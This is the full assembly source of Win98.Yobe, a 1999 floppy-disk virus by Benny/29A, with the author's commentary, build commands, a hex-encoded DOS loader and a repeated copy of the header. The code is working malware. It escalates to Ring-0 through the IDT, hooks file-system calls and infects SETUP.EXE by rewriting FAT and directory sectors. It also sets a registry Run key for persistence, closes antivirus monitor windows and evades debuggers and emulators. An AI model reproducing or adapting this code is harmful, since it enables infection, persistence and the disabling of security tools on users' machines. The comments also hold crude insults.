?????????????????????????????????????????????????????????????????[yobe.asm]???
; ??????? ??????? ???????
; ??? ??? ??? ??? ??? ???
; Win98.Yobe.24576 ?????? ??????? ???????
; by Benny/29A ??????? ??????? ??? ???
; ??????? ??????? ??? ???
;
;
;
;Author's description
;?????????????????????
;
;Hey reader! R u st0ned or drunk enough? If not, then don't read this, coz this
;is really crazy. Let me introduce u FIRST FAT12 infector (cluster/directory
;virus, this is also used to call), fully compatible with windozes (Win98)!
;No no, that's not enough. This is also resident, multithreaded in both of
;Ring-0 and Ring-3 levels with anti-debugging, anti-heuristic, anti-emulator and
;anti-monitor features, using Win9X backdoor to call DOS services and working
;with CRC32, Windows registry and API functions.
;Among all these features, I don't hope it has any chances to spread outta
;world. It infects only diskettes (A: only) and only one file - SETUP.EXE. More
;crazy than u thought, nah? Yeah, I'm lazy so I didn't want to test my code on
;my harddisk and I also didn't want to think about infication of more than one
;file. When I finished Win98.BeGemot, I was totally b0red of those stupid PE
;headerz, RVAs and such like. I wanted to code something really original, not
;next average-b0ring virus. I hope I successed. This virus doesn't demonstrate
;only porting old techniques (c Dir-II virus) to new enviroment, but also
;hot-new techniques (e.g. Ring0 threads). To be this virus really heavilly
;armoured is missing some poly/meta engine. Unfortunately, this conception of
;virus doesn't allow me to implement such engines (neither compression), coz
;I can't modify virus code. However, I included many usefull trix to fool
;debuggerz as well as heuristic scannerz. Bad thing is that this babe is
;detectable by NODICE32 - NODICE32 can find suspicious code (such as modifying
;IDT) and so it immediately reports an unknown virus. There ain't chance to
;improve it, coz I can't use any kind of encryption. Fortunately, other AVs
;find sh!t :D. I hope u will like this piece of work (it took me much time to
;code it, albeit it is very small (code is small, headerz r huge :) and
;optimized) and u will learn much from that. U want probably ask me, why I didn't
;coded stealth virus. U r right, It's easy to implement full-stealth mechanism,
;but, but, ... I won't lie u - I'm lazy :).
;Gimme know, if u will have any comments, if u will find any bugs or anything
;else...thnx.
;
;
;
;What will happen on execution ?
;???????????????????????????????-
;
;Virus will:
;1) Setup up SEH frame
;2) Check for CRC32 of virus body
;3) Check for application level debugger
;4) Reset SEH frame and run anti-heuristic code
;5) Kill some AV monitors (AVP, AMON) + some anti-heuristic code
;6) Check for SoftICE
;7) Copy virus to internal buffer, create new Ring-3 thread and wait for
; its termination
;8) - Jump to Ring-0 (via IDT)
;9) - Check for residency and install itself to memory
;10) - Quit from Ring-0
;11) Restore host
;12) Execute host
;13) Restore host, so host will be infected again
;14) Set registry key, so virus will be executed everytime windows will
; start
;15) Check for payload activation time
;16) - Do payload
;17) Remove SEH frame and quit
;
;
;Virus in memory will:
;1) Check file name
;2) Create new Ring-0 thread and wait for its termination
;3) - Check for drive parameters (BOOT sector check)
;4) - Check for free space (FAT check)
;5) - Redirect cluster_ptr in directory structure (ROOT)
;6) - Write virus to the end of DATA area
;7) - Save back FAT, ROOT and SAVE area (internally used by virus)
;8) - Terminate Ring-0 thread
;9) Pass control to next IFS hooker
;
;
;
;Payload
;????????
;
;In possibility 1:255, virus will show icon on the left side of the screen and
;will rotate with it. U will c, how light-snake will be rolled on the screen.
;User will be really impressed! X-D I still can't stop watching it, it really
;hipnotized me ! :DDDDD.
;
;
;
;Known bugs
;???????????
;
;My computer will sometimes hang while system will try to read infected file.
;Maybe old FD drive, maybe some bugz in virus code. This appear only on my
;computer, so I hope it is error on my side.
;
;
;
;AVP's description
;??????????????????
;
;Benny's notes: This is much better description than at BeGemot virus. However,
;I would have some notes, see [* *] marx:
;
;
;Win95.Yobe [* Fully compatible with Win98, so why Win95? *]
;
;This is a dangerous [* why dangerous?! *] memory resident parasitic Windows
;virus. It uses system calls that are valid under Win95/98 only and can't spread
;under NT. The virus also has bugs and often halts the system when run [* when,
;where, why? *]. Despite on this the virus has very unusual way of spreading,
;and it is interesting enough from technical point of view [* I hope it is *].
;The virus can be found only in two files: "SETUP.EXE" on floppy disks and
;"SETUP .EXE" in the root of the C: drive (there is one space between file name
;and ".EXE" extension).
;
;On the floppy disks the virus uses a trick to hide its copy. It writes its
;complete code to the last disk sectors and modifies the SETUP.EXE file to read
;and execute this code.
;
;The infected SETUP.EXE file looks just as 512 bytes DOS EXE program, but it is
;not. While infecting this file the virus uses "DirII" virus method: by direct
;disk sectors read/write calls the virus gets access to disk directory sectors,
;modifies "first file cluster" field and makes necessary changes in disk FAT
;tables. As a result the original SETUP.EXE code is not modified, but the
;directory entry points to virus code instead of original file clusters.
;
;When the infected SETUP.EXE is run from the affected floppy disk this DOS
;component of the virus takes control, reads the complete virus body from the
;last sectors on the floppy disk, then creates the "C:/SETUP .EXE" file, writes
;these data (complete virus code) to there and executes. The virus installation
;routine takes control then, installs the virus into the system and disinfect
;the SETUP.EXE file on the floppy drive.
;
;While installing itself into the system the virus creates [* opens *] the new
;key in the system registry to activate itself on each Windows restart:
;
; HKLM/Software/Microsoft/Windows/CurrentVersion/Run
; YOBE=""C:/SETUP .EXE" YOBE"
;
;The virus then switches to the Windows kernel level (Ring0), allocates a block
;of system memory, copies itself to there and hooks disk file access Windows
;functions (IFS API). This hook intercepts file opening calls and on opening
;the SETUP.EXE file on the A: drive the virus infects it.
;
;The virus has additional routines. First of them looks for "AVP Monitor" and
;"Amon Antivirus Monitor" windows and closes them; the second one depending on
;random counter displays the line with the words "YOBE" to the left side of the
;screen [* this is usually called as payload :D *].
;
;
;
;Greetz
;???????
;
; B0z0 - Huh, guy, why don't u stay in VX and write
; another Padania virus? Just last one ;))
; Billy Belcebu - Come to .cz! :D
; BitAddict - Nice to met ya. Kewl to met old TriDenTer.
; Darkman - Thank u for that wonderful book. It really
; r0x0r!!!
; Eddow - Would like to meet ya on IRC!
; GriYo - Hey man, just reply me once.
; Itchi - Drink, smoke and fuck again! :) Be back and
; learn to code, pal!
; Kaspersky - U cocksucker, where did u lose the description
; of BeGemot?!!
; Reptile - Smoke, smoke, smoke. This virus is really
; st0ned :D. Btw, still working on macro stuph? ;)
; StarZer0 - Bak infectorz aren't problem :D. Now, when I
; finished FAT12 inf., I will try to code
; multithreaded .txt infector ;)))
; - Fibers r cool, but threads rulez!!!
; The_Might -/
; MidNyte - > F0rk me a joint pleeeeeeaaazzzzz! :D
; Rhape97 -/
; All-nonsmokerz - Why do u drink and drive, when u can smoke
; and fly? X-DDD
; W33D - Thanx for inspiration, this virus is yourz,
; hehe :D.
; iKX stuph - Great work, men!!! XiNE#4 r0x0r!
;
;
;
;How to build
;?????????????
;
;brcc32 yobe.rc
;tasm32 -ml -q -m9 yobe.asm
;tlink32 -Tpe -c -x -aa yobe,,, import32,,yobe.res
;pewrsec yobe.exe
;
;
;
;Who is YOBE?
;???????????????????????????
;
;Many ppl will now laugh me (hi Darkman!, hi Billy!) :DD. Yobe was human, which
;role is situated in Bible. Nah, don't beat me, I'm not catholic. I only like
;stories and ppl in Bible. Yobe was human, which lost his religion. Ehrm,
;let's imagine it as "he stopped believing in what he believed". Story is all
;about that u shouldn't stop believe in what u believe. If u believe in better
;world, don't stop believing in it and do everything to become it truth, don't
;resignate. This ain't only about catholisism, it's about life and utophy.
;But NOW pick up your lazy ass and do anything, anything u think it's right,
;otherwise u won't get what u want!
;
;
;
;(c) 1999 Benny/29A. Enjoy!
.386p ;386 protected opcodez
.model flat ;flat model, 32bit offset
include win32api.inc ;include some structures
PC_WRITEABLE equ 00020000h ;equates used
PC_USER equ 00040000h ;in installation
PR_SHARED equ 80060000h ;stage
PC_PRESENT equ 80000000h
PC_FIXED equ 00000008h
PD_ZEROINIT equ 00000001h
IFSMgr_GetHeap equ 0040000Dh ;used services
IFSMgr_Ring0_FileIO equ 00400032h
IFSMgr_InstallFileSystemApiHook equ 00400067h
UniToBCSPath equ 00400041h
VMMCreateThread equ 00010105h
VMMTerminateThread equ 00010107h
_VWIN32_CreateRing0Thread equ 002A0013h
IFSMgr_Ring0_FileIO equ 00400032h
mem_size equ (virus_end-Start+0fffh+24576)/1000h
;size of virus in memory
VxDCall macro VxDService ;macro to call VxDCall
int 20h
dd VxDService
endm
extrn CreateFileA:PROC ;import APIz used by virus
extrn DeviceIoControl:PROC
extrn ExitProcess:PROC
extrn CloseHandle:PROC
extrn GetModuleFileNameA:PROC
extrn ReadFile:PROC
extrn CreateProcessA:PROC
extrn CopyFileA:PROC
extrn WaitForSingleObject:PROC
extrn DeleteFileA:PROC
extrn CreateThread:PROC
extrn GetCommandLineA:PROC
extrn RegCreateKeyExA:PROC
extrn RegSetValueExA:PROC
extrn RegCloseKey:PROC
extrn LoadIconA:PROC
extrn GetDC:PROC
extrn DrawIcon:PROC
extrn IsDebuggerPresent:PROC
extrn FindWindowA:PROC
extrn PostMessageA:PROC
.data ;data section
VxDName db '//./vwin32',0 ;vwin32 driver name
srcFile db 'a:/setup.exe',0 ;virus locations
dstFile db 'c:/setup.exe',0 ;on disk
regFile db '"C:/SETUP .EXE" ' ;in registry
regVal db 'YOBE',0
regSize = $-regFile
subKey db 'Software/Microsoft/Windows/CurrentVersion/Run',0
sICE db '//./SICE',0 ;SoftICE driver name
ShItTyMoNs: ;monitors to kill
db 'AVP Monitor',0
db 'Amon Antivirus Monitor',0
lpsiStartInfo db 64 ;used by CreateProcessA
db 63 dup (?)
regCont: ;registers passed to API
regEBX dd offset ROOT
regEDX dd 19
regECX dd 14
regEAX dd ?
regEDI dd ?
regESI dd ?
regFLGS dd ?
tmp dd ? ;variable requiered by API
org tmp
hKey dd ? ;key to registry
lppiProcInfo:
hProcess dd ? ;handle to new process
hThread dd ? ;handle to new thread
dwProcessID dd ? ;ID of process
dwThreadID dd ? ;ID of thread
vbuffer db 24576 dup (?) ;buffer filled with virus file
org vbuffer
fname db 256 dup (?) ;name of virus file
ends ;end of data section
.code ;code section
Start: ;virus body starts here
@SEH_SetupFrame ;setup SEH frame
mov esi, offset _crc_ ;start of block
mov edi, crc_end-_crc_ ;size of block
call CRC32 ;check code integrity
cmp eax, 0DACA92DCh ;CRC32 match?
_crc_=$
jne r_exit ;no, quit (anti-breakpoint)
call IsDebuggerPresent ;check if any application level
test eax, eax ;based debugger is present
jne exit ;yeah, quit - anti-debugger
mov [eax], ebx ;cause stack overflow exception
jmp r_exit ;- anti-emulator
seh_jmp:@SEH_RemoveFrame ;reset SEH handler
@SEH_SetupFrame ;...
mov eax, cs ;load CS selector
xor al, al ;only LSB is set under WinNT
test eax, eax ;is WinNT active
je r_exit ;yeah, quit
db 0d6h ;anti-emulator
mov eax, esp ;save ESP to EAX
push cs ;save CS to stack
pop ebx ;get it back to EBX
cmp esp, eax ;match?
jne r_exit ;no, quit - anti-emulator
mov eax, fs:[20h] ;get debugger context
test eax, eax ;is there any?
jne exit ;yeah, quit - anti-debugger
mov esi, offset ShItTyMoNs ;pointer to stringz
xor edi, edi ;to AV monitors
push 2 ;2 monitors
pop ecx ;...
KiLlMoNs:
push ecx ;save counter
push esi ;AV string
push edi ;NULL
call FindWindowA ;find window
test eax, eax ;found?
je next_mon ;no, try to kill other monitor
push edi ;now we will send message
push edi ;to AV window to kill itself
push 12h ;veeeeeeery stupid X-DD
push eax
call PostMessageA ;bye bye, hahaha
next_mon:
sub esi, -0ch ;next monitor string
pop ecx ;restore counter
loop KiLlMoNs ;kill another one, if present
push cs ;store CS
push offset anti_l ;store offset to code
retf ;go there - anti-emulator
CRC32: push ebx ;I found this code in Int13h's
xor ecx, ecx ;tutorial about infectin'
dec ecx ;archives. Int13h found this
mov edx, ecx ;code in Vecna's Inca virus.
NextByteCRC: ;So, thank ya guys...
xor eax, eax ;Ehrm, this is very fast
xor ebx, ebx ;procedure to code CRC32 at
lodsb ;runtime, no need to use big
xor al, cl ;tables.
mov cl, ch
mov ch, dl
mov dl, dh
mov dh, 8
NextBitCRC:
shr bx, 1
rcr ax, 1
jnc NoCRC
xor ax, 08320h
xor bx, 0edb8h
NoCRC: dec dh
jnz NextBitCRC
xor ecx, eax
xor edx, ebx
dec edi
jne NextByteCRC
not edx
not ecx
pop ebx
mov eax, edx
rol eax, 16
mov ax, cx
ret
anti_l: mov edi, offset sICE ;pointer to SoftICE
call OpenDriver ;try to open its driver
jne exit ;SICE present, quit - anti-debugger
mov esi, offset fname ;where to store virus filename
push 256 ;size of filename
push esi ;ptr to filename
push 400000h ;base address of virus
call GetModuleFileNameA ;get virus filename
test eax, eax ;error?
je exit ;yeah, quit
xor eax, eax
push eax
push eax
push OPEN_EXISTING
push eax
push FILE_SHARE_READ
inc eax
ror eax, 1
push eax
push esi
call CreateFileA ;open virus file
inc eax ;error?
je exit ;yeah, quit
dec eax
xchg eax, esi
push 0
push offset tmp
push 24576 ;size of virus file
push offset vbuffer ;ptr to buffer
push esi
call ReadFile ;copy virus file to buffer
push eax
push esi
call CloseHandle ;and close virus file
pop ecx
jecxz exit
xor eax, eax
push offset tmp
push eax
push eax
push offset NewThread
push eax
push eax ;create new thread and let virus
call CreateThread ;code continue there
test eax, eax ;error?
je exit ;yeah, quit
mov word ptr [t_patch], 9090h ;allow execution of code -
push eax ; - anti-emulator
call CloseHandle ;close handle of thread
crc_end=$
e_patch:jmp $ ;this will be patched by thread
; - anti-emulator
exit: call GetCommandLineA ;get command-line
xchg eax, esi ;to esi
lodsb ;load byte
cmp al, '"' ;is it " ? If not, virus filename
jne regSet ;ain't long one - anti-AVer
lchar: lodsb ;load next byte
cmp al, '"' ;is it " ?
jne lchar ;no, continue
_lchar: lodsb ;load byte
cmp al, ' ' ;is it space?
je _lchar ;yeah, continue
test al, al ;is there any parameter?
jne regSet ;yeah, virus is loaded from
;C: drive -> no jump to host
mov edi, offset VxDName ;pointer to vwin32
call OpenDriver ;open driver
je regSet ;if error, quit
dec eax
mov [d_handle], eax ;store handle
mov eax, offset ROOT ;buffer for reading ROOT
push eax ;save ptr
call I25hSimple ;read ROOT
pop ebp ;get it back
jc c_exit ;if error, then quit
_f_cmp: mov esi, ebp ;get ptr to ROOT
push esi
lodsd
test eax, eax ;ZERO?
pop esi
je c_exit ;yeah, no more filez, quit
push 11 ;size of filename (8+3)
pop edi ;to EDI
call CRC32 ;calculate CRC32
cmp eax, 873F6A26h ;match?
je _fn_ok ;yeah, try to restore file
sub ebp, -20h ;no, get next directory record
jmp _f_cmp ;and try again
_fn_ok: mov edi, offset save ;load SAVE area sector from disk
mov [regEBX], edi
mov [regEDX], 2880-1 ;SAVE area = last sector in disk
mov [regECX], 1 ;one sector to read
call I25h ;read it
jc c_exit ;if error, then quit
push word ptr [ebp+1ah] ;store cluster_ptr
push dword ptr [ebp+1ch] ;store filesize
push word ptr [edi] ;restore cluster_ptr
pop word ptr [ebp+1ah] ;...
push dword ptr [edi+2] ;restore filesize
pop dword ptr [ebp+1ch] ;...
call WriteROOT ;restore directory record
pop dword ptr [ebp+1ch] ;restore filesize
pop word ptr [ebp+1ah] ;restore cluster_ptr
jc c_exit ;if error, then quit
mov ebx, offset dstFile ;destination path+filename
push 0
push ebx
push offset srcFile ;source path+filename
call CopyFileA ;copy virus from A: to C: drive
xchg eax, ecx ;error?
jecxz err_cpa ;yeah, quit
xor eax, eax
push offset lppiProcInfo
push offset lpsiStartInfo
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push ebx
call CreateProcessA ;execute original file (host)
xchg eax, ecx ;error?
jecxz err_cpa ;yeah, quit
mov ebp, [hProcess] ;get handle of host process
push -1 ;wait for its signalisation
push ebp ;...
call WaitForSingleObject ;...
push ebp
call CloseHandle ;close handle of host process
push dword ptr [hThread]
call CloseHandle ;close handle of host thread
err_cpa:call WriteROOT ;restore ROOT
push ebx
call DeleteFileA ;and delete host from C: drive
c_exit: push 12345678h ;get handle of vwin32 driver
d_handle = dword ptr $-4
call CloseHandle ;and close it
regSet: push offset tmp
push offset hKey
push 0
push 3
push 0
push 0
push 0
push offset subKey
push 80000002h
call RegCreateKeyExA ;open registry
test eax, eax
jne r_exit
push regSize
push offset regFile
push 1
push 0
push offset regVal
mov ebx, dword ptr [hKey]
push ebx ;set key - virus will be executed
call RegSetValueExA ;everytime Windows will start
push ebx
call RegCloseKey ;close registry
dw 310fh ;RDTCS
cmp al, 'Y' ;1:255 possibility
jne r_exit ;payload won't be activated
payload:push 0 ;payload will be activated
call GetDC ;get device context of desktop
xchg eax, ebx ;save HDC to EBX
push 29ah ;ID of icon
push 400000h ;base of virus
call LoadIconA ;load icon
xor edx, edx ;EDX=0
l_payload:
pushad ;store all registers
push eax ;icon handle
push edx ;Y possition
push 0 ;X possition
push ebx ;device context handle
call DrawIcon ;draw icon on desktop
popad ;restore all registers
sub edx, -30 ;increment Y possition
loop l_payload ;long payload :)
r_exit: @SEH_RemoveFrame ;remove SEH frame
push 0
call ExitProcess ;and exit
NewThread:
pushad ;store all registers
t_patch:jmp $ ;will be patched - anti-emulator
call EnterRing0 ;jmp to Ring-0
pushad ;store all registers
mov eax, dr0 ;get debug register
cmp eax, 'YOBE' ;check if we r already resident
je quitR0 ;yeah, quit
push 24576
VxDCall IFSMgr_GetHeap ;alocate memory for our virus
pop edx ;correct stack
xchg eax, edi ;get address to EDI
test edi, edi ;error?
je quitR0 ;yeah, quit
push edi ;copy virus file to memory
mov esi, offset vbuffer ;from
mov ecx, 24576/4 ;how many
rep movsd ;move!
pop ebp
mov [ebp + 600h+membase-Start], ebp ;save address
lea eax, [ebp + 600h+NewIFSHandler-Start]
push eax ;pointer to new handler
VxDCall IFSMgr_InstallFileSystemApiHook ;install file system hook
pop edx ;correct stack
mov [ebp + 600h+OldIFSHandler-Start], eax
mov eax, 'YOBE' ;mark debug register as "already
mov dr0, eax ;resident flag" - anti-debugger
quitR0: mov dword ptr [p_jmp], 90909090h ;patch code - anti-emulator
popad ;restore all registers
iretd ;and quit from Ring-0
EnterRing0: ;Ring0 port
pop eax ;get address
pushad ;store registers
sidt fword ptr [esp-2] ;load 6byte long IDT address
popad ;restore registers
sub edi, -(8*3) ;move to int3
push dword ptr [edi] ;save original IDT
stosw ;modify IDT
inc edi ;move by 2
inc edi ;...
push dword ptr [edi] ;save original IDT
push edi ;save pointer
mov ah, 0eeh ;IDT FLAGs
stosd ;save it
push ds ;save some selectors
push es ;...
int 3 ;JuMpToRiNg0!
pop es ;restore selectors
pop ds ;...
pop edi ;restore ptr
add edi, -4 ;move with ptr
pop dword ptr [edi+4] ;and restore IDT
pop dword ptr [edi] ;...
p_jmp: inc eax ;some silly loop to fool
cdq ;some AVs. Will be overwritten
jmp p_jmp ;with NOPs l8r by int handler
mov word ptr [e_patch], 9090h ;again, new overwriting of code
popad ; - anti-emulator
ret ;restore all registers and quit
OpenDriver:
xor eax, eax
push eax
push 4000000h
push eax
push eax
push eax
push eax
push edi
call CreateFileA ;open driver
inc eax ;increment handle
ret ;quit
NewIFSHandler: ;file system handler
enter 20h, 0 ;reserve space in stack
push dword ptr [ebp+1ch] ;for parameters
push dword ptr [ebp+18h]
push dword ptr [ebp+14h] ;store parameters
push dword ptr [ebp+10h] ;for next handler
push dword ptr [ebp+0ch]
push dword ptr [ebp+08h]
cmp dword ptr [ebp+0ch], 24h ;open?
jne quitHandler ;no, quit
pushad ;store all registers
call gdlta ;get delta offset
gdelta: db 0b8h ;prefix - anti-disassembler
gdlta: pop ebx ;and anti-lamer
xor ecx, ecx ;ECX=0
mov cl, 1 ;ECX=0 or 1
semaphore = byte ptr $-1
jecxz exitHandler ;semaphore set? then quit
mov byte ptr [ebx + semaphore - gdelta], 0
;set semaphore
lea edi, [ebx + filename - gdelta] ;get filename
mov al, [ebp+10h] ;get disk no.
dec al ;is it A: ?
jne exitHandler ;no, quit
mov al, 'A' ;add A letter
stosb ;store it
mov al, ':' ;add : letter
stosb ;store it
wegotdrive:
xor eax, eax
push eax
inc ah
push eax
mov eax, [ebp+1ch]
mov eax, [eax+0ch]
sub eax, -4
push eax
push edi
VxDCall UniToBCSPath ;convert UNICOE filename to ANSI
sub esp, -10h ;correct shitty stack
mov byte ptr [edi+eax], 0 ;and terminate filename with /0
mov esi, edi
dec esi
dec esi
xchg eax, edi
inc edi
inc edi
inc edi
call CRC32 ;calculate CRC32 of filename
cmp eax, 0B4662AD0h ;is it "A:/SETUP.EXE,0" ?
je setup_exe ;yeah, continue
exitHandler:
mov byte ptr [ebx + semaphore - gdelta], 1 ;set semaphore
popad ;restore all registers
quitHandler:
mov eax, 12345678h
OldIFSHandler = dword ptr $-4
call [eax] ;jump to next handler
sub esp, -18h ;correct stack
leave
ret ;and quit
setup_exe:
mov ecx, 1000h ;thread stack
lea ebx, [ebx + Thread_Infect - gdelta] ;address of thread proc
xor esi, esi ;next crappy parameter
VxDCall _VWIN32_CreateRing0Thread ;create new Ring-0 thread
jmp exitHandler ;and quit
; - anti-everything
db 0b8h ;prefix - anti-disassembler
Thread_Infect: ;Ring-0 thread proc
pushad ;store all registers
jmp ti_next ;jump over
db 3 dup (?) ;leave code be overwritten
ti_next:call tigdelta ;get delta offset
ti_gdelta db 0b8h ;next prefix
tigdelta:
pop ebx
xor ecx, ecx
inc ecx
lea esi, [ebx + BOOT - ti_gdelta] ;read BOOT sector
call Int25h
jc exit_thread
cmp [ebx + BOOT+0bh - ti_gdelta], 01010200h ;check, if diskette is
jne exit_thread ;1,44MB, check FAT and
cmp word ptr [ebx + BOOT+0fh - ti_gdelta], 0200h;ROOT possition
jne exit_thread
push 9
pop ecx
cmp word ptr [ebx + BOOT+16h - ti_gdelta], cx ;...
jne exit_thread ;no, its not 1,44MB FD
lea esi, [ebx + FAT - ti_gdelta]
inc edx
call Int25h ;read FAT
cmp byte ptr [esi], 0f0h ;check if it is 1,44MB
jne exit_thread ;no, quit
lea edi, [ebx + FAT+4223 - ti_gdelta] ;check FAT, if last sectors r
mov ebp, edi ;free
xor eax, eax
sFAT: scasd
jne exit_thread ;no, quit
loop sFAT
mov edi, ebp ;now we will mark FAT, last
inc edi ;sectors will be marked as
mov eax, 0ff0ff00h ;RESERVED
push 73 ;coz we infect 12bit FAT, we
pop ecx ;use this loop to mark it so
markFAT:ror eax, 8
test al, al
je markFAT
stosb
loop markFAT
mov byte ptr [edi], 0fh ;mark end
call ROOTinit
call Int25h ;read ROOT
f_cmp: mov esi, ebp ;get ptr to ROOT
push esi
lodsd
test eax, eax ;ZERO?
pop esi
je exit_thread ;yeah, no more filez, quit
push 11
pop edi
call CRC32 ;calculate CRC32 of file
cmp eax, 873F6A26h ;is it SETUP.EXE?
je fn_ok ;yeah, continue
sub ebp, -20h ;no, process next directory rec.
jmp f_cmp ;...
fn_ok: mov ax, [ebp+1ah] ;save cluster_ptr
mov [ebx + save - ti_gdelta], ax
mov eax, [ebp+1ch] ;save filesize
mov [ebx + save+2 - ti_gdelta], eax
mov word ptr [ebp+1ah], 2800 ;new cluster_ptr
mov dword ptr [ebp+1ch], 512 ;new filesize
xor ecx, ecx
inc ecx
lea esi, [ebx + loader - ti_gdelta]
mov edx, 2880-49
call Int26h ;write DOS loader
push 42
pop ecx
mov esi, [ebx + membase - ti_gdelta]
mov edx, 2880-48 ;write virus
call Int26h
xor ecx, ecx
inc ecx
lea esi, [ebx + save - ti_gdelta]
mov edx, 2880-1
call Int26h ;write SAVE area
call ROOTinit
call Int26h ;write ROOT
push 9
pop ecx
lea esi, [ebx + FAT - ti_gdelta]
xor edx, edx
inc edx
pushad
call Int26h ;write first FAT
popad
sub dl, -9
call Int26h ;write second FAT
exit_thread:
popad ;restore all registers
ret ;and exit
ROOTinit: ;procedure to initialize
push 14 ;registers for reading/writing
pop ecx ;ROOT
push 19
pop edx
lea esi, [ebx + ROOT - ti_gdelta]
mov ebp, esi
ret
Int26h: mov eax, 0DE00h ;write sectors
jmp irfio
Int25h: mov eax, 0DD00h ;read sectors
irfio: VxDCall IFSMgr_Ring0_FileIO
ret
WriteROOT: ;code used to write sectorz
mov [regEBX], offset ROOT ;pointer to ROOT field
mov [regEDX], 19 ;sector number of ROOT
mov [regECX], 14 ;sectors to write
I26h: mov [p2526], 3 ;set WRITE mode
jmp i2526 ;continue
I25h: mov [p2526], 2 ;set READ mode
i2526: and [regEAX], 0 ;zero EAX
I25hSimple:
push 0
push offset tmp
push 28
push offset regCont
push 28
push offset regCont
push 2
p2526 = byte ptr $-1
push dword ptr [d_handle]
call DeviceIoControl ;backdoor used to call DOS services
xchg eax, ecx ;error?
jecxz q2526h ;yeah, set CF and quit
clc ;clear CF
ret ;quit
q2526h: stc ;set CF
ret ;and quit
loader: ;DOS loader
include loader.inc
ldrsize = $-loader ;size of DOS loader
membase dd 'YYYY' ;address, where is virus placed in memory
filename db 100h dup ('Y') ;filename
save db 512 dup ('Y') ;save area
BOOT db 512 dup ('Y') ;BOOT
FAT db 4608 dup ('Y') ;FAT
ROOT db 7168 dup ('Y') ;ROOT
virus_end: ;virus ends here
ends ;end of code section
End Start ;thats all f0lx ;)
?????????????????????????????????????????????????????????????????[yobe.asm]???
???????????????????????????????????????????????????????????????[LOADER.INC]???
dd 5A4Dh
dd 1
dd 5410010h
dd 0FFFFh
dd 0
dd 0
dd 1Ch
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 0
dd 8EC0331Eh
dd 901EC4D8h
dd 1E892E00h
dd 8C2E008Dh
dd 0C7008F06h
dd 9B009006h
dd 920E8C00h
dd 1F0E0E00h
dd 2AB907h
dd 0BB0B10BAh
dd 25CD00CBh
dd 0B8587258h
dd 0DB33716Ch
dd 0BAC93343h
dd 9EBE0012h
dd 7221CD00h
dd 40B49346h
dd 0B900CBBAh
dd 21CD6000h
dd 3EB43972h
dd 2E0721CDh
dd 0BF068Ch
dd 48BB4AB4h
dd 1E21CD05h
dd 77168C06h
dd 7C268900h
dd 0B8070E00h
dd 0BBBB4B00h
dd 0ACBA00h
dd 34B821CDh
dd 0BCD08E12h
dd 1F071234h
dd 0ACBA41B4h
dd 3321CD00h
dd 66D88EC0h
dd 34567868h
dd 68F6612h
dd 0B80090h
dd 0B021CD4Ch
dd 3A43CF03h
dd 5445535Ch
dd 2E205055h
dd 455845h
dd 535C3A43h
dd 50555445h
dd 452E317Eh
dd 4558h
dd 8100h
dd 0FFFFFF00h
dd 0FFFFFFFFh
dw 0EFFh
db 0
???????????????????????????????????????????????????????????????[LOADER.INC]???
; ??????? ??????? ???????
; ??? ??? ??? ??? ??? ???
; Win98.Yobe.24576 ?????? ??????? ???????
; by Benny/29A ??????? ??????? ??? ???
; ??????? ??????? ??? ???
;
;
;
;Author's description
;?????????????????????
;
;Hey reader! R u st0ned or drunk enough? If not, then don't read this, coz this
;is really crazy. Let me introduce u FIRST FAT12 infector (cluster/directory
;virus, this is also used to call), fully compatible with windozes (Win98)!
;No no, that's not enough. This is also resident, multithreaded in both of
;Ring-0 and Ring-3 levels with anti-debugging, anti-heuristic, anti-emulator and
;anti-monitor features, using Win9X backdoor to call DOS services and working
;with CRC32, Windows registry and API functions.
;Among all these features, I don't hope it has any chances to spread outta
;world. It infects only diskettes (A: only) and only one file - SETUP.EXE. More
;crazy than u thought, nah? Yeah, I'm lazy so I didn't want to test my code on
;my harddisk and I also didn't want to think about infication of more than one
;file. When I finished Win98.BeGemot, I was totally b0red of those stupid PE
;headerz, RVAs and such like. I wanted to code something really original, not
;next average-b0ring virus. I hope I successed. This virus doesn't demonstrate
;only porting old techniques (c Dir-II virus) to new enviroment, but also
;hot-new techniques (e.g. Ring0 threads). To be this virus really heavilly
;armoured is missing some poly/meta engine. Unfortunately, this conception of
;virus doesn't allow me to implement such engines (neither compression), coz
;I can't modify virus code. However, I included many usefull trix to fool
;debuggerz as well as heuristic scannerz. Bad thing is that this babe is
;detectable by NODICE32 - NODICE32 can find suspicious code (such as modifying
;IDT) and so it immediately reports an unknown virus. There ain't chance to
;improve it, coz I can't use any kind of encryption. Fortunately, other AVs
;find sh!t :D. I hope u will like this piece of work (it took me much time to
;code it, albeit it is very small (code is small, headerz r huge :) and
;optimized) and u will learn much from that. U want probably ask me, why I didn't
;coded stealth virus. U r right, It's easy to implement full-stealth mechanism,
;but, but, ... I won't lie u - I'm lazy :).
;Gimme know, if u will have any comments, if u will find any bugs or anything
;else...thnx.
;
;
;
;What will happen on execution ?
;???????????????????????????????-
;
;Virus will:
;1) Setup up SEH frame
;2) Check for CRC32 of virus body
;3) Check for application level debugger
;4) Reset SEH frame and run anti-heuristic code
;5) Kill some AV monitors (AVP, AMON) + some anti-heuristic code
;6) Check for SoftICE
;7) Copy virus to internal buffer, create new Ring-3 thread and wait for
; its termination
;8) - Jump to Ring-0 (via IDT)
;9) - Check for residency and install itself to memory
;10) - Quit from Ring-0
;11) Restore host
;12) Execute host
;13) Restore host, so host will be infected again
;14) Set registry key, so virus will be executed everytime windows will
; start
;15) Check for payload activation time
;16) - Do payload
;17) Remove SEH frame and quit
;
;
;Virus in memory will:
;1) Check file name
;2) Create new Ring-0 thread and wait for its termination
;3) - Check for drive parameters (BOOT sector check)
;4) - Check for free space (FAT check)
;5) - Redirect cluster_ptr in directory structure (ROOT)
;6) - Write virus to the end of DATA area
;7) - Save back FAT, ROOT and SAVE area (internally used by virus)
;8) - Terminate Ring-0 thread
;9) Pass control to next IFS hooker
;
;
;
;Payload
;????????
;
;In possibility 1:255, virus will show icon on the left side of the screen and
;will rotate with it. U will c, how light-snake will be rolled on the screen.
;User will be really impressed! X-D I still can't stop watching it, it really
;hipnotized me ! :DDDDD.
;
;
;
